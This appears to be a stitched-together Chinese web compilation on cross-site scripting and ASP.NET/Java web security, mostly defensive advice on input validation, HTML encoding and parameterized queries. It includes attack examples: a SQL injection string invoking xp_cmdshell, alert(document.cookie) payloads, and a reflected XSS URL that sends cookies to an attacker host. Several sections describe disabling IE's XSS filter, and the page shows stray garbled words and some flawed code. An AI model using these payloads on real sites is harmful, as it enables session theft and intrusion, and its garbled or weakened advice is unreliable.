net跨站脚本

1. 跨站脚本攻击的危害

为了搜集用户信息，攻击者通常会在有漏洞的程序中插入 javaScript、VBScript、 ActiveX或Flash以欺骗用户（详见下文）。一旦得手，他们可以盗取用户帐户，修改用户设置，盗取/污染cookie，做虚假广告等。每天都有大量的XSS攻击的恶意代码出现。 Brett Moore的下面这篇文章详细地阐述了“拒绝服务攻击”以及用户仅仅阅读一篇文章就会受到的“自动攻击”。 1.HTML注入。所有HTML注入范例只是注入一个JavaScript弹出式的警告框：alert(1)。
2.做坏事。如果您觉得警告框还不够刺激，当受害者点击了一个被注入了HTML代码的页面链接时攻击者能作的各种的恶意事情。
3.诱捕受害者。 “微博病毒”攻击事件
回顾：
2011年6月28日晚，新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如：“郭美美事件的一些未注意到的细节”，“建党大业中穿帮的地方”，“让女人心动的100句诗歌”，“3D肉团团高清普通话版种子”，“这是传说中的神仙眷侣啊”，“惊爆!范冰冰艳照真流出了”等等微博和私信，并自动关注一位名为hellosamy的用户。
事件的经过线索如下：
20:14，开始有大量带V的认证用户中招转发蠕虫
20:30，某网站中的病毒页面无法访问
20:32，新浪微博中hellosamy用户无法访问
21:02，新浪漏洞修补完毕 随着AJAX（Asynchronous JavaScript and XML，异步JavaScript和XML）技术的普遍应用，XSS的攻击危害将被放大。使用AJAX的最大优点，就是可以不用更新整个页面来维护数据，Web应用可以更迅速地响应用户请求。AJAX会处理来自Web服务器及源自第三方的丰富信息，这对XSS攻击提供了良好的机会。AJAX应用架构会泄漏更多应用的细节，如函数和变量名称、函数参数及返回类型、数据类型及有效范围等。AJAX应用架构还有着较传统架构更多的应用输入，这就增加了可被攻击的点。

2. 如何取消阻止跨站脚本

取消阻止跨站脚本，请按以下步骤操作：

1、点击 IE8 的“工具”-“Internet 选项”。

(2)net跨站脚本扩展阅读

IE浏览器的安全构架：

Internet Explorer使用一个基于区域的安全架构，意思是说网站按特写的条件组织在一起。它允许对大量的功能进行限制，也允许只对指定功能进行限制。

对浏览器的补丁和更新通过Windows更新服务以及自动更新定期发布以供使用。

最新版的Internet Explorer提供了一个下载监视器和安装监视器，允许用户分两步选择是否下载和安装可执行程序。这可以防止恶意软件被安装。

用Internet Explorer下载的可执行文件被操作系统标为潜在的不安全因素，每次都会要求用户确认他们是否想执行该程序，直到用户确认该文件为“安全”为止。

参考资料来源：网络-Internet Explorer

3. 跨站脚本攻击是什么意思

XSS，跨站脚本攻击，Cross-Site
Scripting，为了和前端的CSS避免重名，简称为XSS，是指通过技术手段，向正常用户请求的HTML页面中插入恶意脚本，执行。
这种攻击主要是用于信息窃取和破坏等目的。在防范XSS上，主要就是通过对用户输入的数据做过滤或者或者转义，可以使用框架提供的工具类HTML
Util，另外前端在浏览器展示数据的时候，要使用安全的API展示数据。比如使用inner text而不是inner HTML。

4. 关于.NET网站安全的方案

以下内容为复制信息，非原创，如有帮助请给分！

保证应用程序的安全应当从编写第一行代码的时候开始做起，原因很简单，随着应用规模的发展，修补安全漏洞所需的代价也随之快速增长。根据IBM的系统科学协会（Systems Sciences Institute）的研究，如果等到软件部署之后再来修补缺陷，其代价相当于开发期间检测和消除缺陷的15倍。

为了用最小的代价保障应用程序的安全，在代码本身的安全性、抗御攻击的能力等方面，开发者应当担负更多的责任。然而，要从开发的最初橘升阶段保障程序的安全性，必须具有相应的技能和工具，而真正掌握这些技能和工具的开发者并不是很多。虽然学写安全的代码是一个复杂的过程，最好在大学、内部培训会、行业会议上完成，但只要掌握了下面五种常罩亏见的ASP.NET应用安全缺陷以及推荐的修正方案，就能够领先一步，将不可或缺的安全因素融入到应用的出生之时。

一、不能盲目相信用户输入

在Web应用开发中，开发者最大的失误往往是无条件地信任用户输入，假定用户（即使是恶意用户）总是受到浏览器的限制，总是通过浏览器和服务器交互，从而打开了攻击Web应用的大门。实际上，黑客们攻击和操作Web网站的工具很多，根本不必局限于浏览器，从最低级的字符模式的原始界面（例如telnet），到CGI脚本扫描器、Web代理、Web应用扫描器，恶意用户可能采用的攻击模式和手段很多。

因此，只有严密地验证用户输入的合法性，才能有效地抵抗黑客的攻击。应用程序可以用多种方法（甚至是验证范围重叠的方法）执行验证，例如，在认可用户输入之前执行验证，确保用户输入只包含合法的字符，而且所有输入域的内容长度都没有超过范围（以防范可能出现的缓冲区溢出攻击），在此基础上再执行其他验证，确保用户输入的数据不仅合法，而且合理。必要时不仅可以采取强制性的长度限制策略，而且还可以对输入内容按照明确定义的特征集执行验证。下面几点建议将帮助你正确验证用户输入数据：

⑴ 始终对所有的用户输入执行验证，且验证必须在一个可靠的平台上进行，应当在应物伍神用的多个层上进行。

⑵ 除了输入、输出功能必需的数据之外，不要允许其他任何内容。

⑶ 设立“信任代码基地”，允许数据进入信任环境之前执行彻底的验证。

⑷ 登录数据之前先检查数据类型。

⑸ 详尽地定义每一种数据格式，例如缓冲区长度、整数类型等。

⑹ 严格定义合法的用户请求，拒绝所有其他请求。

⑺ 测试数据是否满足合法的条件，而不是测试不合法的条件。这是因为数据不合法的情况很多，难以详尽列举。

二、五种常见的ASP.NET安全缺陷

下面给出了五个例子，阐述如何按照上述建议增强应用程序的安全性。这些例子示范了代码中可能出现的缺陷，以及它们带来的安全风险、如何改写最少的代码来有效地降低攻击风险。

2.1 篡改参数

◎ 使用ASP.NET域验证器

盲目信任用户输入是保障Web应用安全的第一敌人。用户输入的主要来源是HTML表单中提交的参数，如果不能严格地验证这些参数的合法性，就有可能危及服务器的安全。

下面的C#代码查询后端SQL Server数据库，假设user和password变量的值直接取自用户输入：

SqlDataAdapter my_query = new SqlDataAdapter(
"SELECT * FROM accounts WHERE acc_user='" + user + "' AND acc_password='" + password, the_connection);

从表面上看，这几行代码毫无问题，实际上却可能引来SQL注入式攻击。攻击者只要在user输入域中输入“OR 1=1”，就可以顺利登录系统，或者只要在查询之后加上适当的调用，就可以执行任意Shell命令：

'; EXEC master..xp_cmdshell(Oshell command here')--

■ 风险分析

在编写这几行代码时，开发者无意之中作出了这样的假定：用户的输入内容只包含“正常的”数据——合乎人们通常习惯的用户名字、密码，但不会包含引号之类的特殊字符，这正是SQL注入式攻击能够得逞的根本原因。黑客们可以借助一些具有特殊含义的字符改变查询的本意，进而调用任意函数或过程。

■ 解决方案

域验证器是一种让ASP.NET开发者对域的值实施限制的机制，例如，限制用户输入的域值必须匹配特定的表达式。

要防止上述攻击行为得逞，第一种办法是禁止引号之类的特殊字符输入，第二种办法更严格，即限定输入域的内容必须属于某个合法字符的集合，例如“[a-zA-Z0-9]*”。

2.2 篡改参数之二

◎ 避免验证操作的漏洞

然而，仅仅为每个输入域引入验证器还不能防范所有通过修改参数实施的攻击。在执行数值范围检查之时，还要指定正确的数据类型。

也就是说，在使用ASP.NET的范围检查控件时，应当根据输入域要求的数据类型指定适当的Type属性，因为Type的默认值是String。

<!-- 要求输入值必须是1-9之间的数字 -->
<asp:RangeValidator ... MinimumValue="1" MaximumValue="9" .../>

■ 风险分析

由于没有指定Type属性值，上面的代码将假定输入值的类型是String，因此RangeValidator验证器只能确保字符串由0-9之间的字符开始，“0abcd”也会被认可。

■ 解决方案

要确保输入值确实是整数，正确的办法是将Type属性指定为Integer：

<!-- 要求输入值必须是1-9之间的数字 -->
<asp:RangeValidator ... MinimumValue="1"
MaximumValue="9" Type="Integer"

2.3 信息泄漏

◎ 让隐藏域更加安全

在ASP.NET应用中，几乎所有HTML页面的__VIEWSTATE隐藏域中都可以找到有关应用的信息。由于__VIEWSTATE是BASE 64编码的，所以常常被忽略，但黑客可以方便地解码BASE 64数据，用不着花什么力气就可以得到__VIEWSTATE提供的详细资料。

■ 风险分析

默认情况下，__VIEWSTATE数据将包含：

⑴ 来自页面控件的动态数据。

⑵ 开发者在ViewState中显式保存的数据。

⑶ 上述数据的密码签字。

■ 解决方案

设置EnableViewStatMAC="true"，启用__VIEWSTATE数据加密功能。然后，将machineKey验证类型设置成3DES，要求ASP.NET用Triple DES对称加密算法加密ViewState数据。

2.4 SQL注入式攻击

◎ 使用SQL参数API

正如前文“篡改参数”部分描述的，攻击者可以在输入域中插入特殊字符，改变SQL查询的本意，欺骗数据库服务器执行恶意的查询。

■ 风险分析

恶意查询有可能获取后端数据库保存的任何信息，例如客户信用卡号码的清单。

■ 解决方案

除了前面介绍的办法——用程序代码确保输入内容只包含有效字符，另一种更加健壮的办法是使用SQL参数API（例如ADO.NET提供的API），让编程环境的底层API（而不是程序员）来构造查询。

使用这些API时，开发者或者提供一个查询模板，或者提供一个存储过程，然后指定一系列的参数值，由底层API将参数值嵌入到查询模板，然后将构造出来的查询提交给服务器查询。这种办法的好处是确保参数能够正确地嵌入，例如，系统将对引号进行转义处理，从根本上杜绝SQL注入式攻击的发生。同时，在表单中引号仍是一个允许输入的有效字符，这也是使用底层API的一个优点。

按照这种思路修改前文“篡改参数”部分的例子，结果如下：

SqlDataAdapter my_query = new SqlDataAdapter("SELECT * FROM accounts
WHERE acc_user= @user AND acc_password=@pass", the_connection);
SqlParameter userParam = my_query.Select_Command.Parameters.Add(
"@user",SqlDb.VarChar,20);
userParam.Value=user;
SqlParameter passwordParam = my_query.Select_Command.Parameters.Add(
"@",SqlDb.VarChar,20);
passwordParam.Value=password;

2.5 跨站脚本执行

◎ 对外发的数据进行编码

跨站脚本执行（Cross-site scripting）是指将恶意的用户输入嵌入到应答（HTML）页面。例如，下面的ASP.NET页面虽然简单，却包含着一个重大的安全缺陷：

<%@ Page Language="vb" %>
<asp:Label id="Label1" runat="server">
标签文字
</asp:Label>
<form method="post" runat="server" ID="Form1">
请在此处输入反馈信息<br>
<asp:Textbox ID="feedback" runat="server"/><br>
<asp:Button id="cmdSubmit" runat="server"
Text="提交!" OnClick="do_feedback">
</asp:Button>
</form>
<script runat="server">
Sub do_feedback(sender As Object, e As System.EventArgs)
Label1.Text=feedback.Text
End Sub
</script>

■ 风险分析

攻击者可以用JavaScript代码构造一个恶意的查询，点击链接时JavaScript就会运行。举例来说，脚本可以通过下面的用户输入来嵌入：

<script>alert(document.cookie)
</script>

■ 解决方案

在一个双层的安全体系中，对HTML页面中出现的外发用户数据执行输入验证和HTML编码，确保浏览器只把用户输入数据当成纯粹的文本，而不是其他具有特殊含义的内容，例如HTML代码、JavaScript脚本。

对于本例，只要加入一个HtmlEncode调用即可：

Label1.Text=Server.HtmlEncode(feedback.Text)

这样，应答HTML流将包含用户输入内容的HTML编码版本，也就是说，浏览器不会执行用户输入的JavaScript代码，因为根本不存在HTML的“<SCRIPT>”标记，用户输入的“<”和“>”字符已经被替换成HTML编码版本，即“<”和“>”。

三、使用自动安全测试工具

由于客户需求不断变化，一些单位平均每三个月就要部署新的应用，同时由于人员流动，所以对开发者快速开发健壮的、高质量的代码寄予很高的期望。虽然对所有开发者进行代码安全技术的培训是十分必要的，但不可否认，自动检测代码安全漏洞的工具也有助于快速开发安全的应用程序。

到目前为止，开发者常用的工具只能涵盖功能测试的特定方面，例如性能测试，BUG/故障点侦查。人工检查代码有着许多与生俱来的局限，而且要求开发者具有丰富的代码安全经验，所以对于编写高质量的应用来说，面向应用程序安全及其在恶意环境下行为的工具也是十分关键的。

要迅速提高应用的质量和安全性，最有效的办法是给开发者提供一个自动测试应用的工具。如果在单元测试期间，工具能够检测出应用的安全缺陷，并将修补建议嵌入到代码之中，开发者就能立即找出代码中存在的错误，不仅方便了现有错误的修改，而且也有助于避免将来再犯同样的错误，不断地提高代码抗御攻击的能力。

结束语：Web服务应用正在爆炸式增长，越来越多的应用被推出到防火墙之外，安全性脆弱的Web应用面临的风险也只会有增无减。同时，为了在紧迫的时限之前快速完成应用开发，开发者面临的压力也越来越大。注重编写代码时的安全问题，同时投入必要的资源，这样才能为未来的Web服务应用做好准备，同时确保当前应用的高质量。只有从应用的出生之日开始就采取正确的措施来确保其安全性，才能构造出高质量、安全的应用。

5. 如何防止跨站点脚本攻击

防止跨站点脚本攻击的解决方法：

1.输入过滤

对每一个用户的输入或者请求首部，都要进行过滤。这需要程序员有良好的安全素养，而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题，如错误页等。
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");

2.输出过滤

public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}

byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}

String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
<!-- Maps the 404 Not Found response code
to the error page /errPage404 -->

<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>

<!-- Maps any thrown ServletExceptions
to the error page /errPageServ -->
<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>

<!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric -->
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
任何的非servlet例外都被/errPageGeneric路径捕捉，这样就可以处理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安装三方的应用防火墙，可以拦截css攻击。

附：

跨站脚本不像其他攻击只包含两个部分：攻击者和web站点。
跨站脚本包含三个部分：攻击者，客户和web站点。
跨站脚本攻击的目的是窃取客户的cookies，或者其他可以证明用户身份的敏感信息。

攻击
一个get请求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
会产生如下的结果
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>
但是如果请求被篡改
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
就会得到如下的响应
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
这样在客户端会有一段非法的脚本执行，这不具有破坏作用，但是如下的脚本就很危险了。
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
响应如下：
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站，这样攻击者就得到了客户的cookie。

6. 如何解决跨站脚本攻击

登陆protal后，点击查看报表，这是protal会发送转到cognos的请求，如果使用的IE8，则这个请求会被拦截，提示“Internet Explorer 已对此页面进行了修改，以帮助阻止跨站脚本。单击此处，获取详细信息”。这个错误是由于 IE8 的跨站脚本(Cross-site scripting, XSS)防护阻止了跨站发送的请求。请按以下步骤操作：
1. 点击 IE8 的“工具”-“Internet 选项”，
2. 进入“安全”选项卡，打开“Internet”下方的“自定义级别”，
3.在“安全设置”对话框中找到“启用 XSS 筛选器”，改为“禁用”即可。

7. 跨站脚本攻击有哪些类型

1、持久型跨站：最直接的危害类型，跨站代码存储在服务器（数据库）。

2、非持久型跨站：反射型跨站脚本漏洞，最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。

3、DOM跨站（DOM XSS）:DOM(document object model文档对象模型)，客户端脚本处理逻辑导致的安全问题。

(7)net跨站脚本扩展阅读：

跨站脚本攻击产生的原因是网站过于相信用户的输入，那么解决的办法也很直接，就是从根本上不相信用户的任何输入。一个安全的网站应当对任何用户的任何输入都要进行检查，特别是对用户提交到服务器中保存的数据，更要做筛选。

这种攻击与反射型攻击不同的是，它会把自己的攻击代码保存在网站的服务器上，这样，任何访问了这个页面的用户，都会受到这个攻击。

8. 如何让浏览器允许网站运行跨站脚本

1、工具——Internet选项——高级——在“允许活动内容在计算机上运行”
2、打开Internet Explorer工具栏的Internet选项，打开安全选项，点击自定义级别，找到”启用XSS筛选器”，选择禁用
3、清除IE浏览器的缓存,点IE上的工具——选择下面Internet选项，点Internet删除文件(记得勾上删除所有脱机内容)，确定后再重新打开IE浏览器试试,同时请确认使用的是IE6.0及以上版本。
4、网页上清缓存,在网页上选择工具->Interner选项->删除Cookies和删除文件,确定。
5、点击IE浏览器中的“工具”，选择“internet选项”，进入“安全”页面，点击“自定义级别”，将安全设置设为“低”。
6、清空IE浏览器的cookies文件，在IE浏览器中设置“禁止自动脚本更新“。
脚本script是使用一种特定的描述性语言，依据一定的格式编写的可执行文件，又称作宏或批处理文件。脚本通常可以由应用程序临时调用并执行。各类脚本目前被广泛地应用于网页设计中，脚本不仅可以减小网页的规模和提高网页浏览速度，而且可以丰富网页的表现，如动画、声音等。